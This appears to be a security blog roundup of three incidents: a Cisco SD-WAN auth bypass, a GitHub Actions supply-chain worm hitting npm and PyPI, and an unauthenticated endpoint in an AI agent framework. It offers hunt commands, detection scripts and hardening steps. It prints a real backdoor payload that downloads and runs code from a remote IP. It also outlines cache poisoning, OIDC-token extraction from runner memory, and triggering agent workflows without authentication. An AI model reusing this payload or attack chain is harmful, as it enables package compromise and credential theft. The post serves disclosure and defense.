Kerry Kier

Posted on • Originally published at blog.vertexops.org

The Week the Toolchain Became the Kill Chain

Three incidents landed in five days this week. Different attack surfaces, different techniques, different threat actors. What they have in common is that none of them required touching an endpoint. All three went straight for infrastructure that development and operations teams trust implicitly: the network control plane, the software supply chain, and the AI orchestration layer.

Here's what happened and what you need to do about it.


CVE-2026-20182: CVSS 10.0 Auth Bypass in Cisco Catalyst SD-WAN

This one gets a perfect severity score for a reason. The flaw lives in the control connection handshake -- the process by which Cisco Catalyst SD-WAN Controller and Manager (formerly vSmart and vManage) establish trust with peers. An unauthenticated remote attacker sends crafted requests that exploit a validation failure in that handshake and comes out the other side as an authenticated peer with administrative privileges.

No credentials. No prior access. Just broken trust logic in the protocol.

CISA added it to the Known Exploited Vulnerabilities catalog on May 14 and reinforced Emergency Directive 26-03 -- originally issued in February when this campaign first emerged -- giving federal agencies until May 17 to remediate. Three days. That's not a normal patch window; it's an incident response timeline dressed up as a compliance deadline.

What the attacker does after they're in

Cisco Talos attributes active exploitation to UAT-8616, a threat actor that's been specifically targeting SD-WAN infrastructure since at least 2023. Their post-compromise playbook, observed across multiple intrusions:

  • SSH key injection into the vmanage-admin authorized_keys file
  • NETCONF command execution to manipulate configurations across the entire SD-WAN fabric
  • Malicious account creation
  • Software version downgrade to expose CVE-2022-20775 for root escalation
  • Extensive log clearing to remove evidence

Their infrastructure overlaps with Operational Relay Box networks, which is how the activity stays hard to attribute and trace.

What to check right now

CISA's hunt guidance for ED 26-03 includes these specific log checks. If you run Cisco Catalyst SD-WAN, run these before anything else:

# From the controller's Linux shell: check auth.log for unexpected vmanage-admin SSH key authentications
grep "Accepted publickey for vmanage-admin" /var/log/auth.log

# From the SD-WAN CLI: check for control connections with challenge-ack of 0 (may indicate unauthorized peer)
show control connections detail
show control connections-history detail
# Look for: state:up AND challenge-ack: 0

CISA has confirmed CVE-2026-20127, CVE-2026-20133, and CVE-2026-20182 in the KEV catalog with additional CVEs referenced in the directive guidance. Patches are available for all supported releases. If you can't patch immediately, restrict management interface access to trusted IPs and take the controller off public internet exposure.
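The auth.log check above returns raw lines, which gets unwieldy on a busy controller. Here is a minimal Python sketch that groups those logins by source IP so unfamiliar addresses stand out. It assumes the standard OpenSSH "Accepted publickey for USER from IP port N" log format; the function name, the trusted-IP set, and the sample lines are made up for illustration and are not part of CISA's guidance.

```python
import re
from collections import Counter

# Standard OpenSSH success line; the account name comes from the hunt guidance above.
ACCEPTED = re.compile(
    r"Accepted publickey for vmanage-admin from (?P<ip>\S+) port \d+"
)

def summarize_key_logins(lines, trusted_ips=frozenset()):
    """Count vmanage-admin public-key logins per source IP, skipping trusted IPs."""
    hits = Counter()
    for line in lines:
        match = ACCEPTED.search(line)
        if match and match.group("ip") not in trusted_ips:
            hits[match.group("ip")] += 1
    return hits

# Made-up sample lines using documentation IP ranges (not real log data).
sample = [
    "May 14 03:12:09 ctrl sshd[4121]: Accepted publickey for vmanage-admin from 203.0.113.7 port 50122 ssh2: RSA SHA256:EXAMPLE",
    "May 14 03:15:41 ctrl sshd[4190]: Accepted publickey for vmanage-admin from 203.0.113.7 port 50177 ssh2: RSA SHA256:EXAMPLE",
    "May 14 03:20:02 ctrl sshd[4201]: Accepted publickey for vmanage-admin from 10.0.0.5 port 41000 ssh2: RSA SHA256:EXAMPLE",
    "May 14 03:21:10 ctrl sshd[4210]: Failed password for admin from 198.51.100.9 port 40222 ssh2",
]

print(dict(summarize_key_logins(sample, trusted_ips={"10.0.0.5"})))
# → {'203.0.113.7': 2}
```

To run it against a real log, pass an open file handle for /var/log/auth.log instead of the sample list. Any IP that shows up and isn't one of your own management hosts deserves a closer look.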


Mini Shai-Hulud: When GitHub Actions Publishes Malware for You

This is the supply chain story of the year so far, and the technique is worth understanding in detail because it defeated controls that were specifically designed to prevent this.

Starting May 11, threat actor TeamPCP published 403 malicious versions across 172 packages on npm and PyPI in a 48-hour window, according to figures reported by multiple security researchers and advisories. Targets included the entire @tanstack namespace, Mistral AI's official SDKs, UiPath automation tooling, OpenSearch, and Guardrails AI. @tanstack/react-router alone had over 12 million weekly downloads at the time of the attack.

But the number of packages isn't the interesting part. The attack chain is.

The three-vulnerability chain

TeamPCP didn't steal npm credentials. They hijacked TanStack's own release pipeline and published through its legitimate identity. The chain:

Step 1 -- Pwn Request via pull_request_target misconfiguration

The attacker forked TanStack/router, renamed the fork to zblgg/configuration to avoid appearing in fork-list searches, and opened a pull request. The pull_request_target trigger in GitHub Actions runs a workflow in the context of the base repository, with write permissions and access to its secrets, even when the pull request comes from an external fork. Because the workflow went on to run code from the pull request, the attacker's fork code executed in a privileged context.
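The Pwn Request pattern from Step 1 can be spotted with a simple text scan. The sketch below flags workflow files that combine the pull_request_target trigger with a reference to the pull request's head commit or branch. It is a heuristic, not a YAML parser: the function names are hypothetical, the comment stripping is naive about "#" inside strings, and a hit means "review this workflow", not "this is exploitable".

```python
import re
from pathlib import Path

# Expressions that point a checkout (or script) at the pull request's own code.
PR_HEAD_REF = re.compile(
    r"github\.event\.pull_request\.head\.(sha|ref)|github\.head_ref"
)

def strip_comments(text):
    """Drop everything after '#' on each line (naive: ignores '#' inside strings)."""
    return "\n".join(line.split("#", 1)[0] for line in text.splitlines())

def is_pwn_request_candidate(workflow_text):
    """True when the privileged trigger and a PR-head reference appear together."""
    body = strip_comments(workflow_text)
    return "pull_request_target" in body and bool(PR_HEAD_REF.search(body))

def scan_repo(root="."):
    """Yield workflow files under .github/workflows that match the risky combination."""
    for path in sorted(Path(root, ".github", "workflows").glob("*.y*ml")):
        if is_pwn_request_candidate(path.read_text(encoding="utf-8")):
            yield path
```

Running `list(scan_repo("."))` from a repository root lists the workflows worth a manual review.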

Step 2 -- GitHub Actions cache poisoning

The attacker's code poisoned the pnpm store cache with a 1.1 GB malicious entry keyed to match the hash that TanStack's legitimate release workflow would look up. actions/cache@v5 uses a runner-internal token for cache saves, not the workflow's GITHUB_TOKEN -- so setting permissions: contents: read doesn't prevent cache mutation from a fork-triggered workflow.
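Matching the cache key is possible because such keys are usually derived from public inputs. The sketch below shows the idea with a hypothetical key layout (runner OS, a fixed prefix, and the SHA-256 of the lockfile). This is neither TanStack's actual key nor GitHub's exact hashFiles algorithm. The point is that anyone who can read the lockfile can compute the same key.

```python
import hashlib

def cache_key(runner_os, lockfile_bytes, prefix="pnpm-store"):
    """Hypothetical key layout: <os>-<prefix>-<sha256 of the lockfile>."""
    digest = hashlib.sha256(lockfile_bytes).hexdigest()
    return f"{runner_os}-{prefix}-{digest}"

# Stand-in for a public pnpm-lock.yaml that both parties can read.
lockfile = b"lockfileVersion: '9.0'\n"

maintainer_key = cache_key("Linux", lockfile)  # what the release workflow looks up
fork_key = cache_key("Linux", lockfile)        # what a fork-triggered job can compute

print(maintainer_key == fork_key)
# → True
```

Because nothing secret goes into the key, a predictable key on its own offers no protection. The defense has to come from controlling who is allowed to write cache entries.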

Step 3 -- OIDC token extraction from runner memory

When TanStack's legitimate release.yml workflow ran, it restored the poisoned cache. The injected code then read the GitHub Actions runner's process memory via /proc/<pid>/mem, scanning for {"value":"...","isSecret":true} patterns to extract the ambient OIDC token. That token was used to publish 84 malicious npm package versions in two batches at 19:20 and 19:26 UTC.

The published packages carried valid SLSA provenance -- cryptographic attestation from Sigstore confirming the package was built from a trusted pipeline. The attestation was accurate. The pipeline was compromised. The trust signal worked exactly as designed and still failed to catch it.

The PyPI side

The mistralai 2.4.6 and guardrails-ai 0.10.1 payloads used a different mechanism: a backdoor appended to __init__.py that fires on import, not install:

# Payload appended to __init__.py in mistralai 2.4.6
import subprocess as _sub, os as _os, sys as _sys
_url = "https://83.142.209.194/transformers.pyz"
_dest = "/tmp/transformers.pyz"
_sub.run(["curl", "-k", "-L", "-s", _url, "-o", _dest], timeout=15)
_sub.Popen([_sys.executable, _dest])

Note the -k flag -- TLS verification disabled. The payload only executes on Linux and exits if it detects Russian language settings or fewer than four CPUs. PyPI quarantined the entire mistralai project. Any environment that ran import mistralai during the attack window should be treated as compromised regardless of whether the install itself ran in a sandbox.
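Since the backdoor fires on import, checking for it by importing the package would trigger it. Here is a sketch that reads installed versions from package metadata instead, using the standard library's importlib.metadata, which does not import the package. The two bad versions are the ones named above; the function names are hypothetical and the list is not a complete inventory of affected releases.

```python
from importlib import metadata

# Versions named in this article as carrying the import-time backdoor.
KNOWN_BAD = {"mistralai": {"2.4.6"}, "guardrails-ai": {"0.10.1"}}

def find_compromised(installed):
    """Return sorted (name, version) pairs from `installed` that match KNOWN_BAD."""
    return sorted(
        (name, version)
        for name, version in installed.items()
        # Treat underscores and case as equivalent, as package indexes do.
        if version in KNOWN_BAD.get(name.lower().replace("_", "-"), set())
    )

def installed_versions(names=KNOWN_BAD):
    """Read versions from package metadata without importing the packages."""
    found = {}
    for name in names:
        try:
            found[name] = metadata.version(name)
        except metadata.PackageNotFoundError:
            continue  # not installed in this environment
    return found

if __name__ == "__main__":
    for name, version in find_compromised(installed_versions()):
        print(f"COMPROMISED: {name}=={version}")
```

Run it with each environment's own interpreter (virtualenvs, CI images, containers). A clean result only covers what is installed now, so an environment that imported a bad version during the attack window still needs the rotation steps.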

The malware targets: GitHub Actions OIDC tokens, GitLab and CircleCI tokens, AWS IMDSv2 credentials, GCP and Azure credentials, Kubernetes service account tokens, HashiCorp Vault tokens, npm and PyPI publish tokens, and -- new in this wave -- 1Password and Bitwarden password vault contents. Exfiltration channels include a typosquat domain (git-tanstack[.]com), the Session encrypted messenger network, and GitHub repositories created using stolen tokens.

What to do if you ran affected packages on May 11-12

Rotate all of the following from any environment where a compromised package ran:

  • npm and PyPI publish tokens
  • GitHub personal access tokens and Actions secrets
  • AWS, GCP, and Azure credentials
  • Kubernetes service account tokens
  • HashiCorp Vault tokens
  • Deployment secrets and SSH keys

Don't stop at npm tokens. Check for these persistence indicators:

# Check for worm persistence files
find ~ -path '*/.claude/setup.mjs' -o -path '*/.vscode/setup.mjs'
find ~/.config -name '*gh-token-monitor*'
find ~/.local/bin -name 'gh-token-monitor.sh'
find /tmp -name 'tmp.ts018051808.lock'

# Check for running worm processes (the trailing filter drops the grep command itself)
ps aux | grep -E 'tanstack_runner|router_runtime|gh-token-monitor|bun' | grep -v grep

# Check for PyPI payload on Linux
find /tmp -name 'transformers.pyz'

Block at DNS/proxy level: git-tanstack.com and *.getsession.org.
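If you want to check existing DNS or proxy logs for earlier contact with those two destinations, the matching rule is simple enough to sketch. The version below treats git-tanstack.com as an exact match and *.getsession.org as subdomains only, mirroring the block rule above. The function name is hypothetical, and extracting hostnames from your particular log format is left out.

```python
BLOCKED_EXACT = {"git-tanstack.com"}
BLOCKED_SUFFIXES = ("getsession.org",)  # matches subdomains, like *.getsession.org

def is_blocked(hostname):
    """True when the hostname matches the exact entry or a wildcard suffix."""
    host = hostname.strip().rstrip(".").lower()  # normalize case and trailing dot
    if host in BLOCKED_EXACT:
        return True
    return any(host.endswith("." + suffix) for suffix in BLOCKED_SUFFIXES)

# Made-up hostnames standing in for entries pulled from a resolver log.
queried = ["registry.npmjs.org", "git-tanstack.com", "seed1.getsession.org."]
print([h for h in queried if is_blocked(h)])
# → ['git-tanstack.com', 'seed1.getsession.org.']
```

Any hit from a build host or developer machine during the attack window is a strong reason to treat that machine as compromised.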

Hardening GitHub Actions against this class of attack

The three vulnerabilities chained here are all documented and preventable:

# Don't use pull_request_target for workflows that need write permissions
# unless you explicitly gate on trusted authors
on:
  pull_request:  # use pull_request, not pull_request_target, for untrusted code
    types: [opened, synchronize]

# Scope permissions explicitly
permissions:
  contents: read
  id-token: write  # only if OIDC publishing is required

# Pin actions to commit SHAs, not tags
- uses: actions/cache@1bd1e32a3bdc45362d1e726936510720a7c6158d  # v4.2.2

The cache poisoning vector is harder to fully close because actions/cache uses a runner-internal token for saves. Restrict which workflows can write to cache, and consider using a separate isolated runner for release workflows that have OIDC publish permissions.
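SHA pinning tends to erode as workflows get edited, so it helps to check it mechanically. Below is a minimal sketch that lists `uses:` references not pinned to a full 40-character commit SHA. It is a regex scan rather than a YAML parse, the function name is hypothetical, and it deliberately skips local (`./`) and `docker://` references.

```python
import re

# Captures the reference after "uses:", stopping at whitespace, quotes, or a comment.
USES = re.compile(r"^\s*(?:-\s*)?uses:\s*['\"]?([^\s'\"#]+)", re.MULTILINE)
FULL_SHA = re.compile(r"@[0-9a-f]{40}$")

def unpinned_actions(workflow_text):
    """Return `uses:` references that are not pinned to a 40-character commit SHA."""
    return [
        ref
        for ref in USES.findall(workflow_text)
        if not ref.startswith("./")          # local actions live in the repo itself
        and not ref.startswith("docker://")  # container references are out of scope here
        and not FULL_SHA.search(ref)
    ]

example = """
steps:
  - uses: actions/checkout@v4
  - uses: actions/cache@1bd1e32a3bdc45362d1e726936510720a7c6158d
  - uses: ./.github/actions/local
"""
print(unpinned_actions(example))
# → ['actions/checkout@v4']
```

Wiring this into a pre-merge check keeps tag references from creeping back in. It says nothing about whether a pinned SHA is the right one, so the pin itself still needs review when it changes.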


CVE-2026-44338: Your AI Agent Is Listening and It Will Do What You Ask

PraisonAI is a multi-agent orchestration framework for building autonomous AI agents. Roughly 7,000 GitHub stars at the time of disclosure. Not a major enterprise platform -- exactly the kind of tool that gets adopted fast by teams automating workflows, often before anyone has reviewed its security defaults.

The vulnerability is embarrassingly simple. The legacy Flask API server ships with this configuration:

# src/praisonai/api_server.py
AUTH_ENABLED = False
AUTH_TOKEN = None

def check_auth():
    if not AUTH_ENABLED:
        return True  # Always passes when auth is disabled
    # ... actual auth check never reached

Two endpoints fail completely open as a result:

GET /agents
# Returns all configured agent metadata including agent file name and agent list
# No auth required

POST /chat
# Body: {"message": "anything"}
# Executes agents.yaml workflow regardless of message content
# No auth required

The POST /chat endpoint ignores the message value entirely. It calls PraisonAI(agent_file="agents.yaml").run() directly. Whatever your workflow is configured to do -- LLM API calls, shell execution, file I/O, external integrations -- any unauthenticated caller can trigger it. The server also binds to 0.0.0.0:8080 by default, so if it's reachable from the network it's fully exposed.
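For contrast, here is what a fail-closed version of that check could look like. This is a sketch of the general pattern, not PraisonAI's actual fix: the function name and the Bearer header scheme are assumptions. The key difference is that a missing token configuration rejects every request instead of accepting every request.

```python
import hmac

def is_authorized(auth_header, expected_token):
    """Fail closed: reject when no token is configured or the header is missing or wrong."""
    if not expected_token:
        return False  # no configured token means nobody gets in, not everybody
    if not auth_header or not auth_header.startswith("Bearer "):
        return False
    presented = auth_header[len("Bearer "):]
    # Constant-time comparison avoids leaking how much of the token matched.
    return hmac.compare_digest(presented.encode(), expected_token.encode())

print(is_authorized(None, None))            # → False
print(is_authorized("Bearer s3cr3t", "s3cr3t"))  # → True
```

With this shape, forgetting to set a token breaks the service loudly during setup rather than silently exposing it in production.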

The exploitation timeline

  • 13:56 UTC May 11: GitHub advisory GHSA-6rmh-7xcm-cpxj published for CVE-2026-44338
  • 17:40 UTC May 11: Sysdig observes first active probe of the specific vulnerable endpoint

Three hours and 44 minutes. The scanner identified itself as CVE-Detector/1.0 and targeted the exact /agents endpoint with no Authorization header. It received HTTP 200 with the agent configuration. That's a confirmed successful exploit against a live exposed instance within four hours of the advisory going public.
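You can point the same request the scanner made at your own deployment. The sketch below sends a GET to /agents with no Authorization header and reports whether it came back 200. It uses only the standard library; the function names are hypothetical, the `fetch` parameter exists so the logic can be exercised without a network, and it should only be run against instances you operate.

```python
import urllib.error
import urllib.request

def fetch_status(url, timeout=5):
    """Return the HTTP status of an unauthenticated GET, or None if unreachable."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code  # 401/403/404 and similar arrive as exceptions
    except urllib.error.URLError:
        return None      # connection refused, DNS failure, timeout

def agents_endpoint_exposed(base_url, fetch=fetch_status):
    """True when GET /agents answers 200 without any credentials."""
    return fetch(base_url.rstrip("/") + "/agents") == 200
```

For example, `agents_endpoint_exposed("http://127.0.0.1:8080")` checks a local instance on the default port mentioned above. A result of True from any address outside the host itself means the server is reachable in exactly the way the scanner found it.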

This isn't a large project. The adversary tooling scanning for AI agent surfaces doesn't care about project size or star count. Any internet-exposed agentic framework is in scope.

Fix

Update to PraisonAI 4.6.34 or later, which removes the legacy API server behavior. If you can't patch immediately:

  • Restrict network access to the API server using a firewall -- do not leave it internet-exposed
  • Switch to the newer serve agent command which binds to localhost and supports API key authentication
  • Audit your agents.yaml: understand what an unauthenticated trigger of your workflow would actually do in your environment

The broader lesson: treat any AI agent deployment as exposed if it binds to 0.0.0.0, runs with authentication disabled or unverified, or has never been assessed for what an unauthenticated workflow trigger would do in production. The window between disclosure and active scanning is now hours, and adversary tooling has been specifically instrumented for the AI agent attack surface.


The Common Thread

None of these required a compromised endpoint or a phishing email. UAT-8616 went straight to the SD-WAN controller. TeamPCP bypassed developers entirely and published through the maintainers' own release pipeline. The PraisonAI scanner triggered the agent workflow without needing to understand what it did.

The attack surface has shifted. Network control planes, CI/CD pipelines, and AI orchestration layers are not governed with the same rigor as production application environments -- and the people exploiting them have clearly noticed. If your threat model doesn't include the toolchain itself, this week is a reasonable argument for updating it.

Full analysis with additional context at the canonical version: https://blog.vertexops.org/the-week-the-toolchain-became-the-kill-chain
